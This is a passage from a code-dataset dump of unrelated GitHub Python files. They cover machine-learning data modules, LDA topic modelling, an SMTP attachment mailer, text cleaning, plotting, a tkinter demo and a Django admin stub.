\"kernel\"\n                implying the kernel-routines version\n                number of the ParaMonte library.\n\n    \"\"\"\n\n    def __init__(self,versionPath,versionType):\n        self._versionList = [\"interface\",\"kernel\"]\n        self._versionPath = versionPath\n        self._versionType = versionType\n        self._versionSave = None\n        self._checkVersionType()\n\n    def get(self):\n        \"\"\"\n\n        .. py:method:: get(self)\n\n        Get the Python-interface or kernel version of the\n        ParaMonte library, in verbose format.\n\n        **Parameters**\n\n            None\n\n        **Returns**\n\n            None\n\n        \"\"\"\n        return \"ParaMonte Python \" + self._versionType.capitalize() + \" Version \" + self.dump()\n\n    def dump(self):\n        \"\"\"\n\n        .. py:method:: dump(self)\n\n        Dump **only the version number** of either\n        the Python-interface or kernel of the\n        ParaMonte library.\n\n        **Parameters**\n\n            None\n\n        **Returns**\n\n            None\n\n        \"\"\"\n        for versionType in self._versionList:\n            if versionType==self._versionType:\n                if self._versionSave is None:\n                    versionFileName = \".VERSION_\" + versionType.upper()\n                    versionFilePath = _os.path.join(self._versionPath, versionFileName)\n                    try:\n                        with open(versionFilePath,\"r\") as versionFile:\n                            self._versionSave = versionFile.readline().strip(\"\\n\")\n                    except:\n                        self._versionSave = \"UNKNOWN\"\n                    return self._versionSave\n                else:\n                    return self._versionSave\n\n    def _checkVersionType(self):\n        versionTypeNotFound = True\n        for versionType in self._versionList:\n            if versionType==self._versionType:\n                versionTypeNotFound = False\n                break\n        if versionTypeNotFound:\n            _sys.exit(\"The input versionType is not a valid recognized version type. 
Possible values: \" + \" \".join(self._versionList))\n","repo_name":"rahuldwivedi01/paramonte","sub_path":"src/interface/Python/paramonte/_Version.py","file_name":"_Version.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"4972285930","text":"\"\"\"png_image_test.py\"\"\"\n\nimport unittest\nimport sys\nimport os\nsys.path.insert(0,\n    os.path.join(\n        os.path.dirname(os.path.abspath(__file__)),\n        os.path.join('..', '..', '..')\n    )\n)\n\nimport fpdf\nimport test\nfrom PIL import Image\n\nfrom test.utilities import relative_path_to, \\\n                           set_doc_date_0, \\\n                           calculate_hash_of_file\n\ndef goodFiles():\n    not_supported = [\n        \"e59ec0cfb8ab64558099543dc19f8378.png\", # Interlacing not supported:\n        \"6c853ed9dacd5716bc54eb59cec30889.png\", # 16-bit depth not supported:\n        \"ac6343a98f8edabfcc6e536dd75aacb0.png\", # Interlacing not supported:\n        \"93e6127b9c4e7a99459c558b81d31bc5.png\", # Interlacing not supported:\n        \"18f9baf3834980f4b80a3e82ad45be48.png\", # Interlacing not supported:\n        \"51a4d21670dc8dfa8ffc9e54afd62f5f.png\", # Interlacing not supported:\n    ]\n\n    images = [relative_path_to(f) for f\n              in os.listdir(relative_path_to('.'))\n              if f.endswith(\".png\")\n              and os.path.basename(f) not in not_supported]\n    images.sort()\n    rtn = []\n    for image in images:\n        if os.path.basename(image) in not_supported:\n            pass\n        else:\n            rtn.append(image)\n    return rtn\n\n\nclass InsertPNGSuiteFiles(unittest.TestCase):\n\n    def test_insert_png_files(self):\n        pdf = fpdf.FPDF(unit = 'pt')\n        pdf.compress = False\n\n        for image in goodFiles():\n            pdf.add_page()\n            pdf.image(\n                image, x = 0, y = 0, w = 0, h = 0,\n                type = '', link = None)\n        set_doc_date_0(pdf)\n        outfile = relative_path_to('insert_images_png_test_files.pdf')\n        pdf.output(outfile, 'F')\n        # print(calculate_hash_of_file(outfile))\n\n        test_hash = calculate_hash_of_file(outfile)\n        # ordered the images for reproducibility\n        self.assertEqual(test_hash, \"0085260bea512b9394ce1502b196240a\")\n\n        # self.assertEqual(test_hash, \"4f65582566414202a12ed86134de10a7\")\n        os.unlink(outfile)\n\n    def test_insert_png_files_From_PIL(self):\n        pdf = fpdf.FPDF(unit = 'pt')\n        pdf.compress = False\n        for image in goodFiles():\n            pdf.add_page()\n            im = Image.open(image)\n            pdf.image(\n                im, x = 0, y = 0, w = 0, h = 0,\n                type = '', link = None)\n\n        set_doc_date_0(pdf)\n        outfile = relative_path_to('insert_images_png_test_files.pdf')\n        pdf.output(outfile, 'F')\n        # print(calculate_hash_of_file(outfile))\n\n        test_hash = calculate_hash_of_file(outfile)\n        # ordered the images for reproducibility\n        self.assertEqual(test_hash, \"3cfa70ad39cd595562b726fc16b8510d\")\n\n        # self.assertEqual(test_hash, \"4f65582566414202a12ed86134de10a7\")\n        os.unlink(outfile)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"inprojectspl/pyfpdf","sub_path":"test/image/png_images/png_file_test.py","file_name":"png_file_test.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73897238227","text":"from collections import *\n\nfactorial = [1] * 600\n\na = 1\nfor i in range(1, 500 + 1):\n    a *= i\n    factorial[i] = a\n\nf = open('input.txt')\nfor line in f:\n    n = int(line)\n    if n != 0:\n        print(line.strip() + '!' 
+ ' --')\n print(Counter(str(factorial[n])))\n","repo_name":"yubinbai/pcuva-problems","sub_path":"UVa 324 Factorial frequencies/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"48"} +{"seq_id":"15507353449","text":"from sklearn.preprocessing import LabelEncoder, StandardScaler, Normalizer\nfrom sklearn.pipeline import make_pipeline\nimport pandas as pd\nimport time\n\ndef label_encode_data(df, columns):\n result = df.copy()\n \n label_encoder = LabelEncoder()\n \n for col in columns:\n result[col] = label_encoder.fit_transform(df[col])\n\n return result\n\ndef setup_pipeline(pipeline):\n return make_pipeline(*pipeline)\n\ndef normalize_data_pipeline(df, pipeline):\n transformer = setup_pipeline(pipeline)\n result = transformer.fit_transform(df)\n return pd.DataFrame(result, columns = df.columns)\n\ndef export_to_kaggle_csv(df, predictions):\n timestr = time.strftime(\"%Y%m%d_%H%M%S\")\n output_file_name = \"prediction_\" + timestr + \".csv\"\n\n my_submission = pd.DataFrame({'id': df[\"id\"], 'price': predictions})\n my_submission.to_csv('output/' + output_file_name, index=False)\n print(f\"Exportados los datos a: output/'{output_file_name}'\")\n ","repo_name":"rfminguez/w7-diamond_classification","sub_path":"src/transform_toolbox.py","file_name":"transform_toolbox.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28908624101","text":"#Data processing methodology procurred from: https://towardsdatascience.com/topic-modeling-and-latent-dirichlet-allocation-in-python-9bf156893c24\n\nimport json\nimport contractions\nimport gensim\nimport pickle\nimport re\nfrom nltk.stem import WordNetLemmatizer, SnowballStemmer\nfrom nltk.stem.porter import *\nimport numpy as np\nimport nltk\n\ndef lemmatize_stemming(text):\n stemmer = SnowballStemmer(\"english\")\n return stemmer.stem(WordNetLemmatizer().lemmatize(text, pos='v'))\n\n\ndef process_body(body, edited=False):\n ans = re.sub(r\"http\\S+\", \"\", body) # removes any links to other reddit posts\n\n# want to remove summary of posts, easiest to remove end ones\n tldr_index = ans.lower().find(\"tl;dr\")\n if tldr_index > (len(ans)//2):\n ans = ans[:tldr_index]\n# now check if the post has been edited\n# Most edit: remarks are thanking the commentors, which is not necessary for this project\n elif edited:\n edit_index = ans.lower().find(\"edit:\")\n if edit_index > (len(ans)//2):\n ans = ans[:edit_index]\n# TODO: Look into removing tl;dr's that come at the beginning of posts\n# TODO: Same algorithm for detecting when people put Edit: beginning\n\n# TODO: Expand contractions\n ans = contractions.fix(ans)\n# Tokenizing the body\n resulting_process = []\n# This applies lemmatization and stemming of the tokens\n for tkn in gensim.utils.simple_preprocess(ans):\n if tkn not in gensim.parsing.preprocessing.STOPWORDS and len(tkn) > 3:\n resulting_process.append(lemmatize_stemming(tkn))\n\n return resulting_process\n\n\n# Need to do this check so other files can use process_body\nif __name__ == '__main__':\n np.random.seed(2018)\n nltk.download('wordnet')\n temp_index = 0\n model_size = [5, 10, 15, 20]\n data = []\n\n with open('Raw Data/data.json') as fp:\n data = json.load(fp)\n\n# Preprocess all the bodies\n list_of_bodies = []\n pre_data = {'submissions': []}\n for x in range(len(data['submissions'])):\n data['submissions'][x]['body'] = 
process_body(data['submissions'][x]['body'], data['submissions'][x]['edited'])\n list_of_bodies.append(data['submissions'][x]['body'])\n\n# Creating the dictionary\n dictionary = gensim.corpora.Dictionary(list_of_bodies)\n\n# Getting some statistics on the generated dictionary\n total = 0\n count = 0\n for k, v in dictionary.iteritems():\n total += k\n count += 1\n print(\"Total number of words == \" + str(total))\n print(\"Number of unique tokens == \" + str(count))\n\n# making bag of words out of all the submission bodies\n bag_of_bow = [dictionary.doc2bow(sub) for sub in list_of_bodies]\n\n for topic_num in model_size:\n print('\\n\\n\\n*******TRAINING FOR TOPIC SIZE = ' + str(topic_num) + '****************\\n')\n print('Starting lda training ...')\n lda_model = gensim.models.LdaModel(bag_of_bow, num_topics=topic_num, id2word=dictionary, passes=2)\n print('Finished training!')\n\n # Printing the words from each topic\n for idx, topic in lda_model.print_topics(-1,10):\n print('Topic: {} \\nWords: {}'.format(idx, topic))\n\n\n # Saving all the stuff i might need to save like model, dictionary, and processed bodies\n lda_model.save('Raw Data/ldaModel'+str(topic_num))\n\n with open('Raw Data/dictionary', 'ab') as fp:\n pickle.dump(dictionary, fp)\n\n with open('Raw Data/preData.json', 'w') as fp:\n fp.seek(0)\n fp.truncate()\n json.dump(data, fp)\n\n","repo_name":"terrie9876/LoveAdviceBot","sub_path":"ModelMaker.py","file_name":"ModelMaker.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16857098673","text":"import configparser\nimport os\nimport smtplib \nimport logging\nfrom email.mime import multipart\nfrom email.mime.text import MIMEText\nfrom smtplib import SMTPException\n\n#创建日志\nlog_format = '%(filename)s %(asctime)s %(levelname)s: %(message)s' \nlogging.basicConfig(format = log_format,level = logging.ERROR,filename = 'error.log',filemode = 'w')\nlogger = logging.getLogger(__name__)\n \n#创建配置文件解析对象\nconfig = configparser.ConfigParser()\n#加载配置文件\nconfig.read(\"MailConfiguration.ini\")\n#获取参数\nsender = config.get('Mail', 'sender')\nreceiver = config.get('Mail', 'receiver') \nfiles_path = config.get('File', 'path')\nmail_host = config.get('Mail', 'mail_host')\nmail_port = config.get('Mail', 'mail_port')\nmail_pass = config.get('Mail', 'mail_pass')\n\nmsg = multipart.MIMEMultipart() \nmsg['from'] = sender\nmsg['to'] = receiver\n#标题\nmsg['subject'] = config.get('Title','title') \n#正文\ncontent = MIMEText(config.get('Body', 'body'))\nmsg.attach(content)\nsmtp = None\n\ntry:\n #添加多个附件\n for file_path in files_path.split(','):\n basename = os.path.basename(file_path)\n f = open(file_path,'rb')\n \n att = MIMEText(f.read(),'base64','utf-8') \n att[\"Content-Type\"] = 'application/octet-stream'\n att.add_header('Content-Disposition', 'attachment',filename=('gbk', '', basename))\n msg.attach(att)\n \n smtp = smtplib.SMTP() #登录邮箱服务器\n smtp.connect(mail_host,mail_port) #连接邮箱服务器\n smtp.login(sender,mail_pass) #开始登录\n smtp.sendmail(sender,receiver,msg.as_string()) #发送邮件\nexcept IOError as e:\n logger.error(e)\nexcept SMTPException as e:\n logger.error(e)\nexcept Exception as e:\n logger.error(e)\nfinally:\n if smtp:\n smtp.close()\n\n","repo_name":"sunzhengbo/learning","sub_path":"Python/SendMail/SendMail.py","file_name":"SendMail.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
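The SendMail.py record above assembles the multipart message by hand (MIMEText parts plus manually set Content-Type and Content-Disposition headers) before logging in over a plain smtplib.SMTP connection. On Python 3.6+ the same flow is shorter with email.message.EmailMessage; a minimal runnable sketch follows, where the host, port, credentials, recipient, and attachment path are placeholder assumptions rather than values taken from the record.

import smtplib
from email.message import EmailMessage

SMTP_HOST = "smtp.example.com"   # assumption: placeholder server
SMTP_PORT = 465                  # assumption: implicit-TLS port
SENDER = "sender@example.com"    # assumption: placeholder account
PASSWORD = "app-password"        # assumption: placeholder credential

msg = EmailMessage()
msg["Subject"] = "Report"
msg["From"] = SENDER
msg["To"] = "receiver@example.com"   # assumption: placeholder recipient
msg.set_content("See the attached file.")

# add_attachment() writes the MIME headers that SendMail.py sets by hand
with open("report.txt", "rb") as f:  # assumption: placeholder attachment
    msg.add_attachment(f.read(), maintype="application",
                       subtype="octet-stream", filename="report.txt")

# SMTP_SSL wraps the whole session in TLS from the first byte
with smtplib.SMTP_SSL(SMTP_HOST, SMTP_PORT) as smtp:
    smtp.login(SENDER, PASSWORD)
    smtp.send_message(msg)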
+{"seq_id":"4773142539","text":"import re\nimport nltk\nnltk.download('punkt')\n\n# Deals with cleaning text for now\nimport string\nfrom nltk.corpus import stopwords\nnltk.download('stopwords')\nfrom nltk.tokenize import word_tokenize\n\ndef clean_text(data):\n data = \"\".join([word for word in data if word not in string.punctuation])\n data = word_tokenize(data)\n\n data = [word for word in data if word not in stopwords.words('english')]\n return data\n\nt1 = 'i left with my bouquet of red and yellow tulips under my arm feeling slightly more optimistic than when i arrived'\nt2 = 'i was feeling a little vain when i did this one'\nt3 = 'i cant walk into a shop anywhere where i do not feel uncomfortable'\n\ntext = clean_text(t1)\ntext_train = clean_text(t2)\ntext_test = clean_text(t3)\n\nprint(text)\nprint(text_train)\nprint(text_test)\n# tokenizer = Tokenizer()\n# tokenizer.fit_on_texts(texts)\n# sequence_train = tokenizer.texts_to_sequences(texts_train)\n# sequence_test = tokenizer.texts_to_sequences(texts_test)\n","repo_name":"Maria-Gomes/CSE400-NLP","sub_path":"basic_text_cleaning.py","file_name":"basic_text_cleaning.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40392704989","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nimport pandas as pandas\nimport csv\n\n\ndata = pandas.read_csv(\"/ST-Steiner-env/ST-Steiner/clusters/cluster_n3_05.txt\")\nG = nx.Graph()\n\nfor i in range(len(data)):\n G.add_edge(data.iloc[i][0].split(\"\\t\")[1], data.iloc[i][0].split(\"\\t\")[0])\n\nplt.figure(figsize=(30,30))\n\n\ngraph_pos = nx.spring_layout(G)\nnx.draw_networkx_nodes(G, graph_pos, node_size=10, node_color='blue', alpha=0.5)\nnx.draw_networkx_edges(G, graph_pos, edge_size=6)\nnx.draw_networkx_labels(G, graph_pos, font_size=6, font_family='sans-serif')\nplt.savefig(\"plot.png\", dpi=1000)\n\nplt.savefig(\"plot.pdf\")\nplt.show()\n\n","repo_name":"keremayoz/STSteinerSolver","sub_path":"solver/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30974724327","text":"import tkinter as tk\n\n\nclass APP:\n def __init__(self,master):\n frame = tk.Frame(master)\n frame.pack(side=tk.LEFT,padx=10,pady=10)\n #------在这里用LEFT设置他出现的位置\n\n #----Button 设置一个按钮 frame按钮显示什么字体 bg背景色什么色 fg字体什么颜色, command =他就是如果点击他会出现执行哪些方法\n self.hi_there = tk.Button(frame,text = \"打招呼\",bg=\"black\",fg=\"white\",command=self.say_hi)\n self.hi_there.pack()\n\n def say_hi(self):\n print(\"大家好啊啊啊啊啊啊\")\n\n\n\n\nroot = tk.Tk()\napp = APP(root)\n\n\nroot.mainloop()\n","repo_name":"jiangfeng123/pygame","sub_path":"每日任务/爬虫的自我修养/gui的最终选择 tkinter/tk1.py","file_name":"tk1.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73454688786","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import tree\nfrom matplotlib import pyplot as plt\nplt.style.use('ggplot')\nfrom sklearn.tree import DecisionTreeClassifier\nimport sklearn.metrics as metrics\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import LabelEncoder\nimport random as random\nfrom sklearn.ensemble import RandomForestClassifier \n\n\ndf_train = pd.read_csv(\"glass.test\", skiprows=1, header=None)\n# df_test[9]=LabelEncoder().fit_transform(df_test[9].values)\n\ndf = 
pd.read_csv(\"glass.data\", skiprows=1, header=None)\n# df[9]=LabelEncoder().fit_transform(df[9].values)\n\n\ndef bagging(df_train,df_test, sampleTimes, trainTimes):\n result=pd.DataFrame(data=0,index=range(0,len(df_test)),columns=df_test[df_test.columns[-1]].unique())\n result_entropy=pd.DataFrame(data=0,index=range(0,len(df_test)),columns=df_test[df_test.columns[-1]].unique())\n vote_result=[]\n vote_result_entropy=[]\n for i in range(0, trainTimes):\n df_temp = df_train.iloc[0:1, :]\n # 随机采样 \n for j in range(0, sampleTimes):\n temp = random.randint(0, len(df_train)-1)\n df_temp = df_temp.append(df_train.loc[temp:temp], ignore_index=True)\n x_train=df_temp.iloc[:,:9]\n y_train=df_temp.iloc[:,9:]\n #创建弱训练器并训练\n clf = tree.DecisionTreeClassifier(random_state=42)\n clf_entropy = tree.DecisionTreeClassifier(criterion='entropy',random_state=42)\n clf.fit(x_train,y_train)\n clf_entropy.fit(x_train,y_train)\n x_test=df_test.iloc[:,:9]\n #获得单次训练器的结果\n result_temp=clf.predict(x_test)\n result_temp_entropy=clf_entropy.predict(x_test)\n #存储结果用于投票\n count=0\n for item in result_temp:\n result[item][count]+=1\n count+=1\n count=0\n for item in result_temp_entropy:\n result_entropy[item][count]+=1\n count+=1\n #开始投票\n lists=list(result.columns)\n for i in range(0,len(df_test)):\n max=0\n temp=0\n for j in range(0,len(result.columns)):\n if max self.number_sub:\n raise (f\"Not exist the subset {self.sub_id}\")\n\n # Training / validation set\n trainset = MnistFederatedDM.mnist_train\n rows_by_sub = floor(len(trainset) / self.number_sub)\n tr_subset = Subset(\n trainset, range(self.sub_id * rows_by_sub, (self.sub_id + 1) * rows_by_sub)\n )\n mnist_train, mnist_val = random_split(\n tr_subset,\n [\n round(len(tr_subset) * (1 - self.val_percent)),\n round(len(tr_subset) * self.val_percent),\n ],\n )\n\n # Test set\n testset = MnistFederatedDM.mnist_val\n rows_by_sub = floor(len(testset) / self.number_sub)\n te_subset = Subset(\n testset, range(self.sub_id * rows_by_sub, (self.sub_id + 1) * rows_by_sub)\n )\n\n if len(testset) < self.number_sub:\n raise (\"Too much partitions\")\n\n # DataLoaders\n self.train_loader = DataLoader(\n mnist_train,\n batch_size=self.batch_size,\n shuffle=True,\n num_workers=self.num_workers,\n )\n self.val_loader = DataLoader(\n mnist_val,\n batch_size=self.batch_size,\n shuffle=False,\n num_workers=self.num_workers,\n )\n self.test_loader = DataLoader(\n te_subset,\n batch_size=self.batch_size,\n shuffle=False,\n num_workers=self.num_workers,\n )\n # print(f\"Train: {len(mnist_train)} Val:{len(mnist_val)} Test:{len(te_subset)}\")\n\n def train_dataloader(self):\n \"\"\" \"\"\"\n return self.train_loader\n\n def val_dataloader(self):\n \"\"\" \"\"\"\n return self.val_loader\n\n def test_dataloader(self):\n \"\"\" \"\"\"\n return self.test_loader\n","repo_name":"pguijas/p2pfl","sub_path":"p2pfl/learning/pytorch/mnist_examples/mnistfederated_dm.py","file_name":"mnistfederated_dm.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"48"} +{"seq_id":"37070506571","text":"\nfrom typing import Optional\nimport logging\nfrom functools import partial\n\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport torch\nfrom torch.utils.data import DataLoader\nimport pytorch_lightning as pl\nfrom torchvision import transforms\n\nfrom galaxy_datasets.pytorch import galaxy_dataset\nfrom galaxy_datasets.transforms import default_transforms\n\n\n# 
https://pytorch-lightning.readthedocs.io/en/stable/extensions/datamodules.html\nclass GalaxyDataModule(pl.LightningDataModule):\n # takes generic catalogs (which are already downloaded and happy),\n # splits if needed, and creates generic datasets->dataloaders etc\n # easy to make dataset-specific default transforms if desired\n def __init__(\n self,\n label_cols,\n # provide full catalog for automatic split, or...\n catalog=None,\n train_fraction=0.7,\n val_fraction=0.1,\n test_fraction=0.2,\n # provide train/val/test catalogs for your own previous split\n train_catalog=None,\n val_catalog=None,\n test_catalog=None,\n predict_catalog=None,\n # augmentation params (sensible supervised defaults)\n greyscale=True,\n # album=False, # now True always\n crop_scale_bounds=(0.7, 0.8),\n crop_ratio_bounds=(0.9, 1.1),\n resize_after_crop=224,\n custom_albumentation_transform=None, # will override the settings above\n # hardware params\n batch_size=256, # careful - will affect final performance\n use_memory=False, # deprecated\n num_workers=4,\n prefetch_factor=4,\n seed=42\n ):\n super().__init__()\n\n if catalog is not None: # catalog provided, should not also provide explicit split catalogs\n assert train_catalog is None\n assert val_catalog is None\n assert test_catalog is None\n else: # catalog not provided, must provide explicit split catalogs - at least one\n assert (train_catalog is not None) or (val_catalog is not None) or (test_catalog is not None) or (predict_catalog is not None)\n # see setup() for how having only some explicit catalogs is handled\n\n self.label_cols = label_cols\n\n self.catalog = catalog\n self.train_catalog = train_catalog\n self.val_catalog = val_catalog\n self.test_catalog = test_catalog\n self.predict_catalog = predict_catalog\n\n self.batch_size = batch_size\n\n self.use_memory = use_memory\n if self.use_memory:\n raise NotImplementedError\n\n self.num_workers = num_workers\n self.seed = seed\n\n assert np.isclose(train_fraction + val_fraction + test_fraction, 1.)\n self.train_fraction = train_fraction\n self.val_fraction = val_fraction\n self.test_fraction = test_fraction\n\n self.prefetch_factor = prefetch_factor\n self.dataloader_timeout = 600 # seconds aka 10 mins\n\n logging.info('Num workers: {}'.format(self.num_workers))\n logging.info('Prefetch factor: {}'.format(self.prefetch_factor))\n\n\n if custom_albumentation_transform is not None:\n self.custom_albumentation_transform = custom_albumentation_transform\n logging.info('Using custom albumentations transform for augmentations')\n else:\n self.resize_after_crop = resize_after_crop\n self.crop_scale_bounds = crop_scale_bounds\n self.crop_ratio_bounds = crop_ratio_bounds\n self.greyscale = greyscale\n self.custom_albumentation_transform = None\n\n logging.info('Using albumentations for augmentations')\n self.transform_with_album()\n\n def transform_with_torchvision(self):\n raise NotImplementedError('Deprecated in favor of albumentations')\n\n def transform_with_album(self):\n\n if self.custom_albumentation_transform is not None:\n # should be a Compose() object, TODO assert\n transforms_to_apply = self.custom_albumentation_transform\n else:\n # gives a transforms = Compose() object\n transforms_to_apply = default_transforms(\n crop_scale_bounds=self.crop_scale_bounds,\n crop_ratio_bounds=self.crop_ratio_bounds,\n resize_after_crop=self.resize_after_crop,\n pytorch_greyscale=self.greyscale\n )\n \n # applies that transforms object\n # albumentations expects np array, and returns dict keyed by \"image\"\n # 
transpose changes from BHWC (numpy/TF style) to BCHW (torch style) \n # cannot use a lambda or define here because must be pickleable for multi-gpu\n self.transform = partial(do_transform, transforms_to_apply=transforms_to_apply)\n\n # only called on main process\n def prepare_data(self):\n pass # could include some basic checks\n\n # called on every gpu\n\n def setup(self, stage: Optional[str] = None):\n\n self.specify_catalogs(stage)\n\n # Assign train/val datasets for use in dataloaders\n # assumes dataset_class has these standard args\n if stage == \"fit\" or stage is None:\n self.train_dataset = galaxy_dataset.GalaxyDataset(\n catalog=self.train_catalog, label_cols=self.label_cols, transform=self.transform\n )\n self.val_dataset = galaxy_dataset.GalaxyDataset(\n catalog=self.val_catalog, label_cols=self.label_cols, transform=self.transform\n )\n\n # Assign test dataset for use in dataloader(s)\n if stage == \"test\" or stage is None:\n self.test_dataset = galaxy_dataset.GalaxyDataset(\n catalog=self.test_catalog, label_cols=self.label_cols, transform=self.transform\n )\n\n if stage == 'predict': # not set up by default with stage=None, only if explicitly requested\n if self.predict_catalog is None:\n raise ValueError('Attempting to predict, but GalaxyDataModule was init without a predict_catalog arg. init with GalaxyDataModule(predict_catalog=some_catalog, ...)')\n self.predict_dataset = galaxy_dataset.GalaxyDataset(\n catalog=self.predict_catalog, label_cols=self.label_cols, transform=self.transform\n )\n\n def train_dataloader(self):\n return DataLoader(self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, pin_memory=True, persistent_workers=self.num_workers > 0, prefetch_factor=self.prefetch_factor, timeout=self.dataloader_timeout)\n\n def val_dataloader(self):\n return DataLoader(self.val_dataset, batch_size=self.batch_size, shuffle=False, num_workers=self.num_workers, pin_memory=True, persistent_workers=self.num_workers > 0, prefetch_factor=self.prefetch_factor, timeout=self.dataloader_timeout)\n\n def test_dataloader(self):\n return DataLoader(self.test_dataset, batch_size=self.batch_size, shuffle=False, num_workers=self.num_workers, pin_memory=True, persistent_workers=self.num_workers > 0, prefetch_factor=self.prefetch_factor, timeout=self.dataloader_timeout)\n\n def predict_dataloader(self):\n return DataLoader(self.predict_dataset, batch_size=self.batch_size, shuffle=False, num_workers=self.num_workers, pin_memory=True, persistent_workers=self.num_workers > 0, prefetch_factor=self.prefetch_factor, timeout=self.dataloader_timeout)\n\n def specify_catalogs(self, stage):\n if self.catalog is not None:\n # will split the catalog into train, val, test here\n self.train_catalog, hidden_catalog = train_test_split(\n self.catalog, train_size=self.train_fraction, random_state=self.seed\n )\n self.val_catalog, self.test_catalog = train_test_split(\n hidden_catalog, train_size=self.val_fraction/(self.val_fraction + self.test_fraction), random_state=self.seed\n )\n del hidden_catalog\n else:\n # assume you have passed pre-split catalogs\n # (maybe not all, e.g. 
only a test catalog, or only train/val catalogs)\n            if stage == 'predict':\n                assert self.predict_catalog is not None\n            elif stage == 'test':\n                # only need test\n                assert self.test_catalog is not None\n            elif stage == 'fit':\n                # only need train and val\n                assert self.train_catalog is not None\n                assert self.val_catalog is not None\n            else:\n                # need all three (predict is still optional)\n                assert self.train_catalog is not None\n                assert self.val_catalog is not None\n                assert self.test_catalog is not None\n            # (could write this shorter but this is clearest)\n\ndef default_torchvision_transforms(greyscale, resize_size, crop_scale_bounds, crop_ratio_bounds):\n    # refactored out for use elsewhere, if need exactly these transforms\n    # assume input is 0-255 uint8 tensor\n\n    # automatically normalises from 0-255 int to 0-1 float\n    transforms_to_apply = [transforms.ToTensor()] # dataset gives PIL image currently\n\n    if greyscale:\n        # transforms.Grayscale() adds perceptual weighting to rgb channels\n        transforms_to_apply += [GrayscaleUnweighted()]\n\n    transforms_to_apply += [\n        transforms.RandomResizedCrop(\n            size=resize_size, # assumed square\n            scale=crop_scale_bounds, # crop factor\n            ratio=crop_ratio_bounds, # crop aspect ratio\n            interpolation=transforms.InterpolationMode.BILINEAR), # new aspect ratio\n        transforms.RandomHorizontalFlip(),\n        transforms.RandomRotation(\n            degrees=180., interpolation=transforms.InterpolationMode.BILINEAR)\n    ]\n    \n    return transforms_to_apply\n\ndef do_transform(img, transforms_to_apply):\n    return np.transpose(transforms_to_apply(image=np.array(img))[\"image\"], axes=[2, 0, 1]).astype(np.float32)\n\n# torchvision\nclass GrayscaleUnweighted(torch.nn.Module):\n\n    def __init__(self, num_output_channels=1):\n        super().__init__()\n        self.num_output_channels = num_output_channels\n\n    def forward(self, img):\n        \"\"\"\n        PyTorch (and tensorflow) does greyscale conversion as a *weighted* mean by default (as colours have different perceptual brightnesses).\n        Here, do a simple mean.\n        Args:\n            img (Tensor): Image to be converted to grayscale.\n\n        Returns:\n            Tensor: Grayscaled image.\n        \"\"\"\n        # https://pytorch.org/docs/stable/generated/torch.mean.html\n        return img.mean(dim=-3, keepdim=True) # (..., C, H, W) convention\n\n    def __repr__(self):\n        return self.__class__.__name__ + '(num_output_channels={0})'.format(self.num_output_channels)\n\n\n","repo_name":"mwalmsley/galaxy-datasets","sub_path":"galaxy_datasets/pytorch/galaxy_datamodule.py","file_name":"galaxy_datamodule.py","file_ext":"py","file_size_in_byte":10782,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"48"} +{"seq_id":"26071438124","text":"# last digit is the remainder when we %10 and to remove that digit from number //10\ndef rev_integer(n):\n\treversed=0\n\tremainder=0\n\twhile n>0:\n\t\tremainder=n%10\n\t\tn=n//10\n\t\treversed=reversed*10+remainder\n\treturn reversed\n\nif __name__==\"__main__\":\n\tprint(rev_integer(3461))","repo_name":"sayalighaisas/datastructures-algos","sub_path":"reverse_integer.py","file_name":"reverse_integer.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12464885439","text":"from django.contrib import admin\n\nfrom .models import Subscription, User\n\n\n@admin.register(User)\nclass UserAdmin(admin.ModelAdmin):\n    fieldsets = (\n        (None, {\n            'fields': [('email', 'first_name'), ('username', 'last_name')]\n        }),\n        ('Права доступа', {\n            'classes': ('collapse',),\n            
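# only the staff/superuser flags go in this collapsible section\n            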
